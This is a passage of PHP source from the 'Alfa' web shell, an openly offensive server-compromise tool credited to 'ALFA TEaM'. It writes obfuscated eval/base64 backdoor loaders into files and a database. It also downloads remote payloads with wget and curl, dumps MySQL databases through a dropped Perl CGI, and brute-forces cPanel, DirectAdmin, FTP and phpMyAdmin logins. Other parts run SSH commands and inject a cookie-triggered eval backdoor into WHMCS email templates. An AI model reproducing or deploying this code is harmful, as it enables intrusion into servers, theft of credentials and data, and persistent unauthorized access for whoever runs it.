1111. $x("'.$shell.'");
1112. exit;
1113. }?>';
1114. if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));
1115. __alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');
1116. }else{__alert($error);
1117. }}} if($_POST['alfa1']=='db'){ echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);
1118. return false;
1119. \">");
1120. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50') );
1121. create_table($table);
1122. echo("<p>{$select}</p>");
1123. echo($textarea);
1124. echo("<p><input type='submit' value=' '></p></form></p></center>");
1125. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){ $dbhost = $_POST['alfa2'];
1126. $dbuser = $_POST['alfa3'];
1127. $dbpw = $_POST['alfa4'];
1128. $dbname = $_POST['alfa5'];
1129. $file = $_POST['alfa6'];
1130. $method = $_POST['alfa7'];
1131. $shell = $_POST['alfa8'];
1132. $key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
1133. if($key=='')$key='alfa';
1134. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);
1135. }else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];
1136. } if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){ $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");
1137. $q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");
1138. $r=mysqli_fetch_assoc($q);
1139. $func="cr"."ea"."te_"."fun"."ction";
1140. $x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));
1141. ");
1142. $x($r["code"]);
1143. exit;
1144. }?>';
1145. if(@is_file($file)&&@is_writable($file)){ @mysqli_query($conn,'DROP TABLE `alfa_bc`');
1146. @mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
1147. @mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
1148. @file_put_contents($file,$code."\n".@file_get_contents($file));
1149. __alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');
1150. }else{__alert($error);
1151. }}}} echo('</div>');
1152. alfafooter();
1153. } function alfawhois(){ echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');
1154. return false;
1155. \"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;
1156. ' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
1157. if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){ $site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
1158. $target = 'https://dnsquery.org/whois,request/'.$site;
1159. $data = @file_get_contents($target);
1160. if($data==''){ $get = new AlfaCURL();
1161. $get->ssl = true;
1162. $data = $get->Send($target);
1163. } echo __pre();
1164. if(preg_match('/\<pre\>(.*)\<\/pre\>/s',$data,$match)){ echo($match[0]);
1165. } } echo("</div>");
1166. } function alfaremotedl(){ alfahead();
1167. echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
1168. <form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');
1169. return false;
1170. \">
1171. <p><div class='txtfont'>Url: </div>&nbsp;
1172. &nbsp;
1173. &nbsp;
1174. <input type='text' name='d' size='50'></p>
1175. <div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
1176. </form></p></center>");
1177. if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){ echo __pre();
1178. $url = $_POST['alfa1'];
1179. $path = $_POST['alfa2'];
1180. echo('<center>');
1181. if(__download($url,$path)){ echo('<font color="green">Success...!</font>');
1182. }else{ echo('<font color="red">Error...!</font>');
1183. } echo('</center>');
1184. } echo("</div>");
1185. alfafooter();
1186. } function __download($url,$path=false){ if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
1187. $saveas = basename(urldecode($url));
1188. if($path){$saveas=$path.$saveas;
1189. } if($content = __read_file($url)){ if(@is_file($saveas))unlink($saveas);
1190. if(__write_file($saveas, $content)){return true;
1191. }} $buff = alfaEx("wget ".$url." -O ".$saveas);
1192. if(@is_file($saveas)) return true;
1193. $buff = alfaEx("curl ".$url." -o ".$saveas);
1194. if(@is_file($saveas)) return true;
1195. $buff = alfaEx("lwp-download ".$url." ".$saveas);
1196. if(@is_file($saveas)) return true;
1197. $buff = alfaEx("lynx -source ".$url." > ".$saveas);
1198. if(@is_file($saveas)) return true;
1199. $buff = alfaEx("GET ".$url." > ".$saveas);
1200. if(@is_file($saveas)) return true;
1201. $buff = alfaEx("links -source ".$url." > ".$saveas);
1202. if(@is_file($saveas)) return true;
1203. $buff = alfaEx("fetch -o ".$saveas." -p ".$url);
1204. if(@is_file($saveas)) return true;
1205. return false;
1206. } function __read_file($file){ $content = false;
1207. if($fh = @fopen($file, "rb")){ $content = "";
1208. while(!feof($fh)){ $content .= fread($fh, 8192);
1209. } } return $content;
1210. } function alfaSettings(){ alfahead();
1211. AlfaNum(6,7,8,9,10);
1212. echo '<div class=header><p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="g(\'settings\',null,this.protect.value,this.lgpage.value,this.username.value,this.password.value,\'>>\',this.icon.value);
1213. if(this.e.value==0&&this.protect.value==1)setTimeout(\'location.reload()\',1000);
1214. if(this.s.value!=this.icon.value)setTimeout(\'location.reload()\',1000);
1215. return false;
1216. " method=\'post\'>
1217. <div class="txtfont">Protect: </div> <select style="width: 5%;
1218. " name="protect">';
1219. $lg_array = array('0'=>'No','1'=>'Yes');
1220. foreach($lg_array as $key=>$val)echo '<option value="'.$key.'" '.($GLOBALS['Alfa_Protect_Shell']=='1'?'selected':'').'>'.$val.'</option>';
1221. echo("</select>&nbsp;
1222. ");
1223. echo '<div class="txtfont">Show Icons: </div> <select style="width: 5%;
1224. " name="icon">';
1225. $lg_array = array('0'=>'No','1'=>'Yes');
1226. foreach($lg_array as $key=>$val)echo '<option value="'.$key.'" '.($GLOBALS['Alfa_Show_Icons']=='1'?'selected':'').'>'.$val.'</option>';
1227. echo("</select>&nbsp;
1228. ");
1229. echo '<div class="txtfont">login Page: </div> <select style="width: 12%;
1230. " name="lgpage">';
1231. $lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
1232. foreach($lg_array as $key=>$val)echo '<option value="'.$key.'" '.($GLOBALS['Alfa_Login_Page']==$key?'selected':'').'>'.$val.'</option>';
1233. echo("</select>&nbsp;
1234. ");
1235. echo '<div class="txtfont">UserName: </div> <input type="hidden" name="e" value="'.$GLOBALS['Alfa_Protect_Shell'].'"><input type="hidden" name="s" value="'.$GLOBALS['Alfa_Show_Icons'].'"><input size="10" type="text" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['Alfa_User']:$_POST['alfa3']).'" placeholder="solevisible"> <div class="txtfont">Password: </div> <input size="10" type="text" name="password" placeholder="*****"> <input type="submit" name="btn" value=" "></form></center><br>';
1236. if($_POST['alfa5']=='>>'){ if(!empty($_POST['alfa3'])){ $protect = $_POST['alfa1'];
1237. $lgpage = $_POST['alfa2'];
1238. $username = $_POST['alfa3'];
1239. $password = md5($_POST['alfa4']);
1240. $icon = $_POST['alfa6'];
1241. @chdir($GLOBALS['home_cwd']);
1242. $basename = @basename($_SERVER['PHP_SELF']);
1243. $data = @file_get_contents($basename);
1244. $find_user = '/\$GLOBALS\[\'Alfa_User\'\](.*?);
1245. /i';
1246. $find_pw = '/\$GLOBALS\[\'Alfa_Pass\'\](.*?);
1247. /i';
1248. $find_lg = '/\$GLOBALS\[\'Alfa_Login_Page\'\](.*?);
1249. /i';
1250. $find_p = '/\$GLOBALS\[\'Alfa_Protect_Shell\'\](.*?);
1251. /i';
1252. $icons = '/\$GLOBALS\[\'Alfa_Show_Icons\'\](.*?);
1253. /i';
1254. if(!empty($username)&&preg_match($find_user,$data,$e)){ $new = '$GLOBALS[\'Alfa_User\'] = \''.$username.'\';
1255. ';
1256. $data = str_replace($e[0],$new,$data);
1257. } if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){ $new = '$GLOBALS[\'Alfa_Pass\'] = \''.$password.'\';
1258. ';
1259. $data = str_replace($e[0],$new,$data);
1260. } if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){ $new = '$GLOBALS[\'Alfa_Login_Page\'] = \''.$lgpage.'\';
1261. ';
1262. $data = str_replace($e[0],$new,$data);
1263. } if(!empty($find_p)&&preg_match($find_p,$data,$e)){ $new = '$GLOBALS[\'Alfa_Protect_Shell\'] = \''.$protect.'\';
1264. ';
1265. $data = str_replace($e[0],$new,$data);
1266. } if(preg_match($icons,$data,$e)){ $new = '$GLOBALS[\'Alfa_Show_Icons\'] = \''.$icon.'\';
1267. ';
1268. $data = str_replace($e[0],$new,$data);
1269. } @file_put_contents($basename,$data);
1270. echo __pre();
1271. echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font>';
1272. }else{ __alert("UserName is Empty !");
1273. } } echo('</div>');
1274. alfafooter();
1275. } function alfaplus(){ alfahead();
1276. echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');
1277. ">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
1278. if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){ try{ $s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
1279. $msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
1280. $news = new AlfaCURL();
1281. if($news->Send($s1)){ $xml = $news->Send($s1);
1282. }else{ $xml = false;
1283. } if($xml){ if(@simplexml_load_string($xml)){ $doc = new DOMDocument;
1284. $doc->loadXML($xml);
1285. $data = $doc->getElementsByTagName('data')->item(0);
1286. $items = $data->getElementsByTagName('item');
1287. foreach($items as $item){ $title = $item->getElementsByTagName('title')->item(0)->nodeValue;
1288. $description = $item->getElementsByTagName('description')->item(0)->nodeValue;
1289. $link = $item->getElementsByTagName('link')->item(0)->nodeValue;
1290. $pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
1291. echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#ff4d4d'>Date: $pubDate</font></small></center></pre>");
1292. } }else{ echo($msg);
1293. } }else{ echo($msg);
1294. } }catch(Exception $e){ echo $e->getMessage();
1295. }}elseif($_POST['alfa1']=='about'){ echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
1296. <font size='+2' color='#00A220'>&#9774;
1297. ~ PEACE ~ &#9774;
1298. </font><br>
1299. <font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
1300. <font color='#00A220'>Contact : solevisible@gmail.com</font><br>
1301. <font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
1302. <font color='#FFFFFF'>Skype : sole.sad</font><br>
1303. <font color='#FF0000'>Persian Gulf For Ever</font><br>
1304. <font color='#FF0000'>Iranian Hackers :)</font><br>
1305. <font color='#FF0000'>Special Thanks To: R3veC0der</font><br>
1306. </center></pre>";
1307. } echo('</div>');
1308. alfafooter();
1309. } function alfaDumper(){ alfahead();
1310. echo('<div class="header">');
1311. AlfaNum(8,9,10);
1312. echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value);
1313. return false;
1314. \"><p>";
1315. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50') );
1316. create_table($table);
1317. echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
1318. $username = ($_POST['alfa3']);
1319. $password = ($_POST['alfa4']);
1320. $dbname = ($_POST['alfa5']);
1321. $dfile = ($_POST['alfa6']);
1322. $host = ($_POST['alfa7']);
1323. if(!empty($dbname)){ echo __pre();
1324. $msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
1325. if(@mysqli_connect($host,$username,$password,$dbname)){ $string = alfaEx("mysqldump");
1326. if(strlen($string)>0){ alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > $dfile");
1327. echo($msg);
1328. }else{ @mkdir('cgialfa',0755);
1329. @chdir('cgialfa');
1330. alfacgihtaccess('cgi');
1331. @file_put_contents("alfa_dumper.alfa",'#!/usr/bin/perl -I/usr/local/bandmain'."\n".'#solevisible@gmail.com'."\n".'use CGI;
1332. print "Content-type: text/html\n\n";
1333. print "<html>";
1334. print "<title>Alfa Team~ Mysql Dumper</title>";
1335. print "<body>";
1336. my $host = CGI::url_param(\'host\');
1337. my $username = CGI::url_param(\'username\');
1338. my $password= CGI::url_param(\'password\');
1339. my $dbname = CGI::url_param(\'dbname\');
1340. my $dfile = CGI::url_param(\'dfile\');
1341. system("mysqldump --single-transaction --host=\"".$host."\" --user=\"".$username."\" --password=\"".$password."\" ".$dbname." > ". $dfile);
1342. print "<font color=\'green\'>Check This => ".$dfile."</font></body></html>";
1343. ');
1344. @chmod("alfa_dumper.alfa", 0755);
1345. echo AlfaiFrameCreator("cgialfa/alfa_dumper.alfa?host=".urlencode($host)."&username=".urlencode($username)."&password=".urlencode($password)."&dbname=".urlencode($dbname)."&dfile=".urlencode($dfile)."");
1346. } }else{ echo('<center>mysqli_connect : Error!</center>');
1347. } } echo('</div>');
1348. alfafooter();
1349. } function Alfa_DirectAdmin_Cracker($info){ if(!$info['mysql']) $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
1350. else $url = $info['protocol'].$info['target'].'/phpmyadmin';
1351. $curl = curl_init();
1352. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
1353. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2;
1354. WOW64;
1355. rv:17.0) Gecko/20100101 Firefox/17.0');
1356. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
1357. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
1358. curl_setopt($curl, CURLOPT_HEADER,0);
1359. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1360. curl_setopt($curl, CURLOPT_URL,$url);
1361. curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
1362. if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
1363. $result = curl_exec($curl);
1364. $curl_errno = curl_errno($curl);
1365. $curl_error = curl_error($curl);
1366. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
1367. } elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1368. $info['target'] = $url;
1369. CrackerResualt($info);
1370. } curl_close($curl);
1371. } function Alfa_CP_Cracker($info){ $url = $info['protocol'].$info['target'].':'.$info['port'];
1372. $curl = curl_init();
1373. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
1374. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2;
1375. WOW64;
1376. rv:17.0) Gecko/20100101 Firefox/17.0');
1377. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
1378. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
1379. curl_setopt($curl, CURLOPT_HEADER,0);
1380. curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
1381. curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
1382. curl_setopt($curl, CURLOPT_URL, $url);
1383. $result = curl_exec($curl);
1384. $curl_errno = curl_errno($curl);
1385. $curl_error = curl_error($curl);
1386. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
1387. } elseif(preg_match('/filemanager/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1388. $info['target'] = $url;
1389. CrackerResualt($info);
1390. } curl_close($curl);
1391. } function Alfa_FTP_Cracker($info){ $url = $info['protocol'].$info['target'];
1392. $curl = curl_init();
1393. curl_setopt($curl, CURLOPT_URL, $url);
1394. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2;
1395. WOW64;
1396. rv:17.0) Gecko/20100101 Firefox/17.0');
1397. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1398. curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
1399. $result = curl_exec($curl);
1400. $curl_errno = curl_errno($curl);
1401. $curl_error = curl_error($curl);
1402. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
1403. } elseif(preg_match('/(\d+):(\d+)/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1404. $info['target'] = $url;
1405. CrackerResualt($info);
1406. } curl_close($curl);
1407. } function Alfa_Mysql_Cracker($info){ if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){ CrackerResualt($info);
1408. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1409. } } function Alfa_FTPC($info){ if($con=@ftp_connect($info['target'],$info['port'])){ if($con){ $login=@ftp_login($con,$info['username'],$info['password']);
1410. if($login){CrackerResualt($info);
1411. }}} @ftp_close($con);
1412. } function CrackerResualt($info){ $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
1413. $c = @fopen($info['fcrack'],'a+');
1414. @fwrite($c, $res);
1415. @fclose($c);
1416. } function Alfa_Call_Function_Cracker($method,$info){ switch($method){case 'cp':return Alfa_CP_Cracker($info);
1417. break;
1418. case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);
1419. break;
1420. case 'ftp':return Alfa_FTP_Cracker($info);
1421. break;
1422. case 'mysql':return Alfa_Mysql_Cracker($info);
1423. break;
1424. case 'mysql':return Alfa_FTPC($info);
1425. break;
1426. } } function alfaCrackers(){ alfahead();
1427. AlfaNum(9,10);
1428. echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);
1429. return false;
1430. "><div class="txtfont">Login Page: <select onclick="dis_input(this.value);
1431. " name="loginpanel">';
1432. foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
1433. echo '</select> Protocol: <select id="protocol" name="protocol">';
1434. foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
1435. echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
1436. Port: <input id="port" type="text" name="port" value="2083">
1437. <table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
1438. <textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
1439. &nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
1440. Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
1441. <p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
1442. $target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
1443. $port = $_POST['alfa2'];
1444. $usernames= $_POST['alfa3'];
1445. $passwords = $_POST['alfa4'];
1446. $fcrack = $_POST['alfa5'];
1447. $cracking = $_POST['alfa6'];
1448. $protocol = $_POST['alfa7'];
1449. $loginpanel = $_POST['alfa8'];
1450. $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
1451. if($cracking=='start'){ echo __pre();
1452. $exuser = explode("\n",$usernames);
1453. $expw = explode("\n",$passwords);
1454. foreach($exuser as $user){ foreach($expw as $pw){ $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
1455. Alfa_Call_Function_Cracker($loginpanel,$array);
1456. } } echo '<br><font color="red">Attack Finished...</font>';
1457. } echo '</div>';
1458. alfafooter();
1459. } function alfassh2(){ if(function_exists('ssh2_connect')){ $_SESSION['connected']= false;
1460. $ssh_ip = $_POST['alfa1'];
1461. $ssh_login = $_POST['alfa2'];
1462. $ssh_pass = $_POST['alfa3'];
1463. $ssh_port = $_POST['alfa4'];
1464. $ssh_command = $_POST['alfa5'];
1465. if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port)) { if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass)) { $_SESSION['connected']= true;
1466. } } if($_SESSION['connected']!== true){ alfahead();
1467. echo "<div class=header>";
1468. echo "
1469. <form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value);
1470. return false;
1471. '>
1472. <table cellpadding='2' cellspacing='0'><tr>
1473. <td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr>
1474. <td><input type=text name=ssh_ip value=''></td>
1475. <td><input type=text name=ssh_login value=''></td>
1476. <td><input type=text name=ssh_pass value=''></td>
1477. <td><input type=text name=ssh_port value=''></td>
1478. <td><input type='submit' name='submit' value=' '></td>
1479. </table></form>";
1480. echo "</div>";
1481. alfafooter();
1482. } if($_SESSION['connected']==true){ alfahead();
1483. echo "<div class=header>";
1484. echo "
1485. <form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\");
1486. return false;
1487. '>
1488. <table cellpadding='2' cellspacing='0'><tr>
1489. <td><input type=text name=ssh_command value=''></td>
1490. <td><input type='submit' name='execute' value=' '></td></table></form>
1491. <form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\');
1492. return false;
1493. '>
1494. <input type=submit name='destsession' value='logout'>
1495. </form>";
1496. $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
1497. stream_set_blocking($alfastream,true);
1498. $output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
1499. if($_POST['alfa6']=='>>'){ echo '<pre class=ml1>';
1500. ob_start();
1501. echo stream_get_contents($output);
1502. echo htmlspecialchars(ob_get_clean());
1503. } echo "</div>";
1504. alfafooter();
1505. }}else{ alfahead();
1506. echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
1507. alfafooter();
1508. } } function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";
1509. } function alfaShellInjectors(){ alfahead();
1510. echo '<div class=header>';
1511. AlfaNum(11);
1512. echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
1513. $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;
1514. "><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
1515. if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){ AlfaNum();
1516. echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value);
1517. return false;
1518. \" method='post'>";
1519. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50') );
1520. create_table($table);
1521. echo $selector;
1522. echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
1523. if(isset($_POST['alfa6'])) { $dbu = $_POST['alfa6'];
1524. $dbn = $_POST['alfa7'];
1525. $dbp = $_POST['alfa8'];
1526. $dbh = $_POST['alfa9'];
1527. $path = $_POST['alfa10'];
1528. $method = $_POST['alfa4'];
1529. $index = "{php}".ALFA_UPLOADER.";
1530. {/php}";
1531. $newin = str_replace("'","\'",$index);
1532. $newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"]));
1533. die(\"!\");
1534. }{\/php}";
1535. if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){ if(filter_var($path,FILTER_VALIDATE_URL)){ $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
1536. $soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
1537. $soleGet = mysqli_fetch_assoc($soleSave);
1538. $tempSave1 = $soleGet['message'];
1539. $tempSave = str_replace("'","\'",$tempSave1);
1540. $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
1541. $result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
1542. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
1543. $result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
1544. if(function_exists('curl_version') && $method == 'auto'){ $AlfaSole = new AlfaCURL(true);
